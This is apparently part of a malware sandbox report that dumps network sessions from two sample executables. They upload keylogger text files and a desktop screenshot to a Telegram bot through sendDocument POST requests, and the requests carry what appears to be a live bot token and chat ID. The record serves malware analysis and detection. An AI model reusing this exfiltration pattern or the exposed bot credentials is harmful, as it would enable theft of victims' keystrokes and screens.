00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:28:46 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:46 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:50 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49900	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:50 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 634 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:50 UTC	634	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 49 5a 4f 44 74 72 73 6a 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 34 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 34 30 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 34 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataIZODtrsj.txt"Content-Type: application/octet-stream[08:28:40]<<Program Manager>>[08:28:40]<<Program Manager>>[08:28:41]<<Program Mana
2024-12-03 13:28:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:51 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:51 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3900,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232531,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49903	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:51 UTC	555	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 601 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:51 UTC	601	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 67 6f 50 4c 74 64 64 6c 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 34 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 34 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 38 3a 34 31 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDatagoPLtddl.txt"Content-Type: application/octet-stream[08:28:41]<<Program Manager>>[08:28:41]<<Program Manager>>[08:28:41]<<Program Mana
2024-12-03 13:28:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:28:52 GMT Content-Type: application/json Content-Length: 546 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:28:52 UTC	546	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 39 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 35 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 4b 65 79 44 Data Ascii: {"ok":true,"result":{"message_id":3901,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232532,"document":{"file_name":"KeyD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49909	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:28:54 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 4c 73 44 63 62 48 6d 46 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotLsDcbHmF.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:28:54 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 